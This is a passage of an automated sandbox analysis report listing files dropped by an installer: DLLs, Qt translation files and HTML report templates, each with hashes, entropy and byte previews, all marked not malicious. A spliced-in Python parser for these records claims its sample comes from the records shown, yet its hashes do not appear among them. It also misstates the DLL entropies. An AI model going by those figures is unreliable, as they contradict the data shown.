                                                                                                                                                                                                  Size (bytes):22208
                                                                                                                                                                                                  Entropy (8bit):6.906399541614446
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:3CYPvVX8rFTsdWVghW/VvSx9YOCAs/nGfe4pBjSfZCLWNArXVWQ4mWbmqnaj9Rlg:1PvVXfW2hW9SUA0GftpBj8yBlBRAkad
                                                                                                                                                                                                  MD5:779A8B14C22E463EA535CBCA9EA84D49
                                                                                                                                                                                                  SHA1:4620531D5291878C10D6E3974F240B98BC7FB4B9
                                                                                                                                                                                                  SHA-256:FC0551DE11B310DFD8F3FC924F309D5E754B547FFC475CF6C3D007BB5366F148
                                                                                                                                                                                                  SHA-512:08882528DF66FC582A890AD64C7F96E8F9DE56D4871A4D9B6B32E1C3FFB0C29B425F4CC893B2575F6697FFAFBB56BA84D43D602483B0470488DF823D445B84E4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@.......6....@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18624
                                                                                                                                                                                                  Entropy (8bit):7.046229749504995
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:WUWVghW/zvSx9YOCAs/nGfe4pBjSfEtcsWNArXVWQ4mWV9QqnajxcRGlPMRd54xS:WUW2hW7SUA0GftpBjBj3ll7PedGxC/
                                                                                                                                                                                                  MD5:BFB08FB09E8D68673F2F0213C59E2B97
                                                                                                                                                                                                  SHA1:E1E5FF4E7DD1C902AFBE195D3E9FD2A7D4A539F2
                                                                                                                                                                                                  SHA-256:6D5881719E9599BF10A4193C8E2DED2A38C10DE0BA8904F48C67F2DA6E84ED3E
                                                                                                                                                                                                  SHA-512:E4F33306F3D06EA5C8E539EBDB6926D5F818234F481FF4605A9D5698AE8F2AFDF79F194ACD0E55AC963383B78BB4C9311EE97F3A188E12FBF2EE13B35D409900
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18112
                                                                                                                                                                                                  Entropy (8bit):7.0782836442636174
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:MZeW2hWngbCA0GftpBjPEGVlvQyURz87X:3n8ixEQvU2L
                                                                                                                                                                                                  MD5:7697F94ED76B22D83D677B999EDFC2E1
                                                                                                                                                                                                  SHA1:42AFB5B8E76B8B77D845156B7124CC3E0C613F91
                                                                                                                                                                                                  SHA-256:50FD585270FA79FD056EC04B6991D0E65CCA28C1116834A59D5591F8D8C2C214
                                                                                                                                                                                                  SHA-512:1EF120BAA532692D22F8939D9F149035E38DA6B65B889BA6CCB7858596718D569B0B9B35AD3609DE9DAF229553254966BF3D5A6ABC4AF1FF56732CE8560B31C8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):24993
                                                                                                                                                                                                  Entropy (8bit):5.35342565714326
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:6vsXcNgywHOUW6MAlHWknGhq984qSDPGZbGCeozTGAGaj:8gywHOUXMAlHWknOqi+G5GC9
                                                                                                                                                                                                  MD5:3928085E21EA3A08476A8FF476B3DF1E
                                                                                                                                                                                                  SHA1:811D18C1C6F92CB49902E060E5C47700D5AF87B1
                                                                                                                                                                                                  SHA-256:A5D01162A23EE399F78DCFE1717BAA140BAB5CC4F099699DE000FCA923097790
                                                                                                                                                                                                  SHA-512:0ED2A612815E1632D037F0651B70AB8797EA5B9CF06B040EFE1DE5805F0F6E50A3BFA84F2A28A7A45156C2141BA5A5FE1CAC99260BBAAC1A0B25DE1929747F40
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........N0...;.......;...w...;.......;.......;..; ...O..P....[..L....^..*C...^..IB..(5......G.......H,..F...K...7...N:......V...<o.._...Q.......$J......F....y..G/.......?..............N....t..%....t..G....t..Pm.....8....j......5t...+..@...:E..H5..N...f...*g......=........).......Q...~..,....`..0n...e..O.......P.......... =...>..*.y.....*.y.....*.%.. ..*.0.. ..+.......+.....6.+......+....l.+...."G.G.......G....&..H0...PI.Hw9.....Hw9.....I....#..J6......J6....<.J6......J6...@s.LD....T.L.b..P..M.S..8..R.....<.V....*..Wi...O..W.T.....Z.|..HA.[f3..K..gc....^.w0K..?$..H...!i......Q^...T......."...`...~..0... d..=....T..(...2...........O"......T..9.E..8..L.#..Ws.M$o...8.e.....f.l8.../....^..@...I....*......:p......H.......N...>......>......3..)...l...A.......2..5.l..S..AV...#..y....M_...0..I.......H.......N...tb..........................J.......5.......Ez.(....Il.1V...$..R....+..W.<..Tg.f.~...H..........1........^../E...5..............c..=..;6...U..q.J..F6..I....y..I
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1168
                                                                                                                                                                                                  Entropy (8bit):4.8708624632073105
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFokVpsuS4XqW1H5l+Ah1j0Kt5RGDLDiReEhyv:H9VpsR4XqW1H5lBh1j0U2DLDos
                                                                                                                                                                                                  MD5:6A9A7FB51DD16A4EDBEAF52A7567EA70
                                                                                                                                                                                                  SHA1:27B2444894F6B432AD36CB14D79BAD1BA6529887
                                                                                                                                                                                                  SHA-256:C4AD3344E412976BD9F7B8DDC8C60FDB94461201C814529CC5300FFDEB35BC08
                                                                                                                                                                                                  SHA-512:E627B085002A98E4C899FB4B9C7F4A90531C2D25233E3AD1ED0C4BFA87D0DE7D8E38F07D3CD0130955670D9C5F50F1D2BA40BBDF355F0FD202B1CE278A734F54
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Tila:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>K.ytt.j.rjestelm.:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Valmistaja:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>K.ytt.j.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tyyppi:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>P.iv.m..r.:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentit:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Palvelu</center></b></td><td><b><ce
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28545
                                                                                                                                                                                                  Entropy (8bit):4.714189994601161
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:GURDrpuVMlrYXZpq/VKVACvlcuO+YLDeeeIY1P5Cd+wQeBx6HaGnsFQFR:GUDrpuylriTWVKVAACu4fFa1P54+wQN
                                                                                                                                                                                                  MD5:2AADC93C38DBB7E1D048B05B63133217
                                                                                                                                                                                                  SHA1:66BBDB0EF40D01A0AECC0FA5219B464EE08CBB37
                                                                                                                                                                                                  SHA-256:A1DB9CBE9D30A6FC2800C0B5AC7F92E9DDDF3B6C742E0EEC892C758F66413C93
                                                                                                                                                                                                  SHA-512:63D4998822C2A9D679C07A4C172C12B6EEF93E8B7853C146689CC1F5316B67AF25661F9B4F65D0B167035CB825116B60B950C2A3E2995BAF5FCF6494AB02F404
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........[*...;.......;.......;.......;..!....;..E....O..^(...[..Y....^..0....^..U...(5......G....p..H,..R...K...A*..N:...^..V...F..._..._.......).......R....y..S/......................[....t..+k...t..S....t..]......BH...j......5t......@...D5..H5..[...f...0.......GT...................~..3....`..8~...e..]C......]m.......l. =...H..*.y.....*.y.....*.%..%V.*.0..%..+.......+.......+....L.+....4.+....'5.G.... ..G....+..H0...]..Hw9.....Hw9.....I....)6.J6....X.J6......J6....$.J6...Kc.LD......L.b..]..M.S..B..R.......V....1#.Wi...\..W.T...+.Z.|..Tu.[f3..XF.gc....D.w0K..I...H...&9......_....T......."..5....~..8... d..G....T../'..2....K......\B......b..9.E..A..L.#..eC.M$o...T.e.......l8...7....^..K...I....T......D^......UI......[...>...i..>......3..0o..l...M.......;8.5.l..a..AV...(..y....Z?...0..V"......U.......[...tb..6.......................V.......>.......Q..(....U..1V...*&.R....2..W.<..bG.f.~.."z......5p..1....[...^..7....5..............c..H".;6...c..q.J..R...I.......I
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29376
                                                                                                                                                                                                  Entropy (8bit):6.5989266511221745
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:K47isbM4Oe5grykfIgTmLSW2hWPgbCA0GftpBjF17cylBRAkV8:X1Mq5grxfInqH8iBgoRAz
                                                                                                                                                                                                  MD5:D0D380AF839124368A96D6AA82C7C8AE
                                                                                                                                                                                                  SHA1:E2AC42F829085E0E5BEEA29FCFF09E467810A777
                                                                                                                                                                                                  SHA-256:06985D00BF4985024E95442702BBDB53C2127E99F16440424F3380A88883F1A5
                                                                                                                                                                                                  SHA-512:DAF3997922E18C0BE088A15209C9F01CC1DDA90972A6AADCF76DE867B85D34483AD5E138E3FA321C7140BF8E455C2B908D0A4DB6A9E35011786398656B886479
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................@...............................P.......,....@..............................+...........@...............6...<..............8............................................................................text....,.......................... ..`.rsrc........@.......2..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
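Added example, not part of the Joe Sandbox report: a small Python parser for the dropped-file records in this section. It normalises the report's mixed hash keys ("SHA1" next to "SHA-256"), sanity-checks hash lengths before they are promoted to IOCs (a truncated hash copied from a report matches nothing and silently weakens a blocklist), cross-checks the "File Type" claim against the MZ and PE signatures still visible in the dotted preview, and computes 8-bit Shannon entropy, which is assumed here to be what the "Entropy (8bit)" column reports. The sample input is constructed from two of the records above with the previews and the SHA-512 line shortened or omitted; the helper names are the example's own.

```python
import math
import re
from collections import Counter
from typing import Dict, List

# Constructed sample: two dropped-file records in the report's "Key:Value" layout
# (hashes copied from the records above, previews shortened, SHA-512 omitted).
SAMPLE_RECORDS = """\
Process:C:\\Users\\user\\AppData\\Local\\Temp\\is-HNUHO.tmp\\KC0uZWwr8p.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):498216
Entropy (8bit):6.392626000362742
Encrypted:false
MD5:C80BA989BA52F73AD4332EA7B3BE0499
SHA1:F4A2A70F2E23DB44AEC358F3DD282E68483AC631
SHA-256:C86C36B20B602D6A063575136ECB417EB0A7AD8DDDBB966750FA348FEB74D309
Malicious:false
Preview:MZ......................@.......PE..L.....&^....
Process:C:\\Users\\user\\AppData\\Local\\Temp\\is-HNUHO.tmp\\KC0uZWwr8p.tmp
File Type:Qt Translation file
Category:dropped
Size (bytes):24993
Entropy (8bit):5.35342565714326
Encrypted:false
MD5:3928085E21EA3A08476A8FF476B3DF1E
SHA1:811D18C1C6F92CB49902E060E5C47700D5AF87B1
SHA-256:A5D01162A23EE399F78DCFE1717BAA140BAB5CC4F099699DE000FCA923097790
Malicious:false
Preview:<.d....!..`...B.....
"""

# The report is not consistent about hash key spelling; map every variant to one name.
KEY_ALIASES = {"sha-1": "sha1", "sha-256": "sha256", "sha-512": "sha512"}
HEX_LENGTHS = {"md5": 32, "sha1": 40, "sha256": 64, "sha512": 128}


def parse_records(text: str) -> List[Dict[str, object]]:
    """Split the flat key:value dump into one dict per dropped file.
    A new record starts at every 'Process:' line (the file path heading was
    lost in extraction, so this is the only reliable record boundary)."""
    records: List[Dict[str, object]] = []
    current: Dict[str, object] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if ":" not in line:
            continue
        key, value = line.split(":", 1)       # first colon only: values contain "C:\"
        key = KEY_ALIASES.get(key.strip().lower(), key.strip().lower())
        if key == "process":
            if current:
                records.append(current)
            current = {}
        if key == "size (bytes)":
            current["size"] = int(value)
        elif key == "entropy (8bit)":
            current["entropy"] = float(value)
        elif key in ("encrypted", "malicious"):
            current[key] = value.strip().lower() == "true"
        else:
            current[key] = value
    if current:
        records.append(current)
    return records


def check_hashes(record: Dict[str, object]) -> List[str]:
    """Problems that disqualify a record as an IOC source: SHA-256 missing, or any
    present hash that is not hex of the expected length (typical copy/paste damage)."""
    problems: List[str] = []
    if "sha256" not in record:
        problems.append("missing sha256")
    for name, length in HEX_LENGTHS.items():
        value = record.get(name)
        if value is not None and not re.fullmatch(r"[0-9A-Fa-f]{%d}" % length, str(value)):
            problems.append(f"bad {name}: {value}")
    return problems


def looks_like_pe(record: Dict[str, object]) -> bool:
    """The preview replaces non-printables with dots, so a PE shows 'MZ' at offset 0
    and the 'PE\\0\\0' signature as 'PE..' further in."""
    preview = str(record.get("preview", ""))
    return preview.startswith("MZ") and "PE.." in preview


def type_mismatch(record: Dict[str, object]) -> bool:
    """True when 'File Type' says PE32 but the preview does not, or vice versa."""
    return str(record.get("file type", "")).startswith("PE32") != looks_like_pe(record)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte in 0..8; assumed to be the report's 'Entropy (8bit)' measure."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def iocs(records: List[Dict[str, object]]) -> Dict[str, str]:
    """sha256 -> file type for every record that passes the hash check, deduplicated."""
    return {str(r["sha256"]).lower(): str(r.get("file type", ""))
            for r in records if not check_hashes(r)}


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for r in recs:
        print(r["sha256"], r["size"], f"{r['entropy']:.2f}",
              "PE" if looks_like_pe(r) else "non-PE",
              "TYPE MISMATCH" if type_mismatch(r) else "type ok",
              check_hashes(r) or "hashes ok")
    print(f"{shannon_entropy(bytes(range(256)) * 4):.3f} bits/byte for a uniform buffer")
```

Running the script prints one line per record plus the entropy of a uniform byte buffer (8.000), which is the ceiling the report's column is measured against; the high-entropy console DLLs in this section sit just above 7 while the translation and HTML files sit well below, which is what a packed or compressed payload versus plain resources looks like in that column.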
Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:dropped
Size (bytes):1244
Entropy (8bit):5.128056579045673
Encrypted:false
SSDEEP:24:lFojhoCsuSH9AXqJH39/t0Kt5RGDXS9ReEhyv:HuZsRH9AXqJHN/t0U2DYs
MD5:1C7DAA7B7C3119E37B599739F3372A97
SHA1:D8E90B30F5D754C8B7623CF6FE3E5D298E620201
SHA-256:DE38F8530D51823F9DDCB33D410D738513C5E83B7284278507F9FBEA2BF29650
SHA-512:ED3A0FE123F4488AE9A4547B984CC7A21285D2F9638D9A25B772E853D45A3539B1C847046A85159F54029B572B8D9FCE80A4746C8D13928B9AD998F7D6DF4A1F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>........... .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>............:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>..........:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>....:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27444
                                                                                                                                                                                                  Entropy (8bit):4.672755214321859
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:l3POS+SsVKz36+e26v7powzg+fhSsbiGr:hORlVKz3Ze2y7pV00
                                                                                                                                                                                                  MD5:5323FC9E0D0110FE16F649B91167E604
                                                                                                                                                                                                  SHA1:88DBC51B2F91B23DC75A2EB1A64EC8FFE05C7FDB
                                                                                                                                                                                                  SHA-256:660389BE673840C90CC9F93C9BE9A16E721F9A60C2934A9468C7307044C890E1
                                                                                                                                                                                                  SHA-512:526655F5663509FBB545E67F643CEEB2D5FE558FBF02466AC58733ADEE8BDF8996B3FCB9CCBB860E49FADEF3B4E27D4C127FD4F3AD6FDCB8EEE27DC993CA21BC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........W(...;...N...;.......;.......;.. ....;..B6...O..Y....[..U....^.......^..Q...(5...w..G.......H,..N...K...>...N:......V...C..._...[2......(T......N....y..Oa.......}.......V......V....t..)....t..O....t..Y......?....j......5t......@...AG..H5..W...f.../.......D:...................~..1....`..6....e..Y.......Y5......... =...EO.*.y.....*.y.....*.%..$>.*.0..$g.+.......+.......+....H.+......+....&..G.......G....*G.H0...Ye.Hw9...7.Hw9...'.I....'..J6......J6......J6....h.J6...G..LD......L.b..Y..M.S..?..R.......V..../=.Wi...X..W.T.....Z.|..P..[f3..T..gc......w0K..Fv..H...%.......Z....T......."..3....~..5... d..D....T..-{..2....=......X.......^c.9.E..>..L.#..a..M$o.....e.......l8...5K...^..H...I....j......Az......QW......W...>...]..>......3......l...I~......8..5.l..]i.AV...'..y....V/...0..R&......Q.......W...tb..42...............K......R.......<.......M~.(....Q..1V...(..R....0..W.<..]..f.~..!.......3 ..1........^..4....5...w......t...c..E..;6..._{.q.J..NL..I.......I
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27888
                                                                                                                                                                                                  Entropy (8bit):4.695402138614251
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ZP5z0nT4x6kjXVkllEmXd6+TfM1nO6Pgv+n4kOby4WvJ:UT4MkbV2EUd6+cnO6YGn4M
                                                                                                                                                                                                  MD5:B1DC69B7C86A8BEBB7B758BB8B241535
                                                                                                                                                                                                  SHA1:B75C4FC69FAC889067A836AB620285984476B7D9
                                                                                                                                                                                                  SHA-256:ADC549E5F4771AE234DB87847B9797C0217581B69C5A06A254877F19D225058F
                                                                                                                                                                                                  SHA-512:62B262F6E79BC8D3A40506FB3CE6DE6528FCFD9C8D62C033584CEF56A0F70ECEAEA4E9B82951639593303AADC88E7758E069B8DE419C2539FC1E75A52F9BE1FD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........X....;.......;.......;.......;..!a...;..Cl...O..[....[..W....^../....^..SX..(5......G....v..H,..PT..K...?...N:...B..V...D..._...\.......).......P}...y..P.......................X....t..*....t..Q\...t..[i.....@....j...q..5t......@...B...H5..Y...f...0.......Eh...................~..2....`..7B...e..Z.......[........R. =...Fw.*.y.....*.y.....*.%..$..*.0..%'.+.....a.+.......+......+....4.+....&..G.... ..G....+..H0...[;.Hw9.....Hw9.....I....(..J6....f.J6......J6......J6...I..LD......L.b..[..M.S..A0.R.......V....0;.Wi...Z..W.T.....Z.|..R-.[f3..U..gc....0.w0K..G...H...%.......\x...T...M..."..4....~..6... d..E....T...Q..2....k......Y.......`..9.E..@>.L.#..b..M$o...@.e.......l8...6m...^..IR..I....z......B.......S.......Y...>...{..>......3../...l...J.......9..5.l.._..AV...(_.y....X....0..S.......R.......YS..tb..5r.......+..............T?......=r......O..(....S..1V...)..R....1..W.<.._..f.~.."H......4^..1....+...^..5....5...#..........c..F0.;6...aE.q.J..O...I..../..I
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28669
                                                                                                                                                                                                  Entropy (8bit):4.635479137963866
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:cjicwqBnzFQm1BpOqG8xEdLtmG7knIwrgGbfpYiRHCOlqGm:QHrFQm1Xc8xEd5mG7kIwkGbxm
                                                                                                                                                                                                  MD5:A5D24342E9B32AD9714C091BB135D180
                                                                                                                                                                                                  SHA1:7B193290CFE8190B60122C2219972512695E5D68
                                                                                                                                                                                                  SHA-256:2C3974E8AE722FF0139E2C83EF01F63717C3A3476F65347D46A3501E6600FBF9
                                                                                                                                                                                                  SHA-512:140DC1532E3B6258A4AEE33DDA17768BD5DAD281B77D60B0B65903B79CD2B53A71B042756AF7AAE249ED3E24968ADF9CA2083517B08B9C5B4CF90CFBF78A09E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<.d....!..`...B..........[....;.......;.......;.. ....;.."....;..F....O..^....[..Zj...^..1u...^..VH..(5...;..G....P..H,..S2..K...BF..N:.. R..V...G].._..._.......*L......S]...y..S.......................[....t..,....t..TB...t..^Q.....C6...j.. ...5t...C..@...E...H5..\o..f...1.......H ...............q...~..4....`..9b...e..].......].......... =...IK.*.y.....*.y.....*.%..&..*.0..&G.+.......+.....:.+......+....r.+....'..G....!..G....,_.H0...^'.Hw9.....Hw9.....I....)..J6......J6....l.J6......J6...K..LD....2.L.b..^~.M.S..C..R.....J.V....1..Wi...]p.W.T...S.Z.|..U..[f3..Y..gc......w0K..J~..H...&......._b...T......."..6....~..8... d..H....T../...2...........\.......c9.9.E..B..L.#..e..M$o.....e.....F.l8...8....^..L0..I....j......EJ......U.......\...>......>......3..1...l...M.......<..5.l..bS.AV...)..y....Z....0..V.......U.......\5..tb..7^......._..............WG......?.......Q..(....Vn.1V...*..R....3m.W.<..b..f.~..#h......60..1........^..7....5..........B...c..H..;6...d[.q.J..R...I.......I
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1148
                                                                                                                                                                                                  Entropy (8bit):4.7922327669232505
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:lFoufsuSqJXqL0He3yk/0Kt5RGDNsm6ReEhyv:HnfsRqJXqL0He3ym0U2D+mAs
                                                                                                                                                                                                  MD5:88B009CCACF0EB1B4A141470D3F160C4
                                                                                                                                                                                                  SHA1:EE0D1A44562CCDEDBCDE92D232FA541F53826B4B
                                                                                                                                                                                                  SHA-256:D2254ED99166A12CE00F93379142ACFCBF9A49AF3FB8789E8215B0C1CCCB4587
                                                                                                                                                                                                  SHA-512:D07C7B90A12E7E48A90BF450A57E4479AE5BB130EFE9950A316D9A7AB9063D94AF0F35942925ACA41A7C2C149A0F31A075C38DD0B34821F88BD81588660D0BE1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistem operasi:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produsen:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Pengguna:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipe:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Tanggal:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentar:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Layanan</center></b></td><td><b><center>Rincian</center>
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18624
                                                                                                                                                                                                  Entropy (8bit):6.982441576564087
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:NvW2hW+77QA0GftpBjuYvd0WrlI663Upe:NR9yi866kQ
                                                                                                                                                                                                  MD5:584766DF684B2AD2A3A5B05A5B457FAC
                                                                                                                                                                                                  SHA1:C207B7AEDB8D978C8320A1454331519A8365F20D
                                                                                                                                                                                                  SHA-256:B15964D49A2C5219E0923137AA9028611BE81FDBDCBB0D43BB3AAA23114E401F
                                                                                                                                                                                                  SHA-512:3BC7D49F997E489466858A21DAA22B397ADB8E736D7E064542ED5F73CD87B52CBD412CDEC2B4B892F9231C2562E24C8DEBAB73054E878405F2B2A022E86D26B8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......!h....@.......................................... ...................<..............8............................................................................text...+........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:Qt Translation file
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28357
                                                                                                                                                                                                  Entropy (8bit):4.7436866012778625
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:5ph1weyWuzmrQaIBqQKp8GweGs4G4fc/xrRFkTMNa1xsEG07LXjXu:5pQeyWuzmMvBqQQ8GfGsQfcJUTM7S6
                                                                                                                                                                                                  MD5:45864510329D981D80C616641357FEFF
                                                                                                                                                                                                  SHA1:C4EB7D6D98D29656FA2DE8E9923750556408E865
                                                                                                                                                                                                  SHA-256:3A3F6762C19E934B6FBE1EF38E0D68A96E8A3B7B27E196655CFA8C257529A947
                                                                                                                                                                                                  SHA-512:93E671353C5C4E2F39656EE64758556BDF2FFA6185F4A4991C12B432870C830D1BACB772FD0CD0F71AF7E088D363AC1475BBA2FBCE6797D992D01BA407915D83
                                                                                                                                                                                                  Malicious:false
